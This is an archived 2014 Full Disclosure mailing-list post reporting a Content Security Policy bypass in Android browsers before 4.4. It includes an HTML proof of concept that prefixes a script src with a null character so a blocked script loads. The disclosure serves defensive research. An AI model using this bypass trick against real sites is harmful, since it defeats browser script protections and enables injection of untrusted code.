[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CSP Bypass on Android prior to 4.4

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] CSP Bypass on Android prior to 4.4
From: E Boogie <evanjjohns@xxxxxxxxx>
Date: Sat, 11 Oct 2014 16:09:51 -0400

I've found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  a.src='\u0000https://js.stripe.com/v2/';
  document.body.appendChild(a);
  
setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{
alert(2);}}, 400);
  return false;">


The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;

The PoC worked if you see a popup containing stripes e(){} object. I
set the Timeout kind of short, so you may have to press the button
twice before you see the popup.

I have a PoC test page at ejj.io/test.php

Cheers,
Evan J

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] CSP Bypass on Android prior to 4.4
  - From: E Boogie

Prev by Date: [FD] SAP Security Note 1908531 - XXE in BusinessObjects Explorer
Next by Date: [FD] PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability
Previous by thread: [FD] SAP Security Note 1908531 - XXE in BusinessObjects Explorer
Next by thread: Re: [FD] CSP Bypass on Android prior to 4.4
Index(es):
- Date
- Thread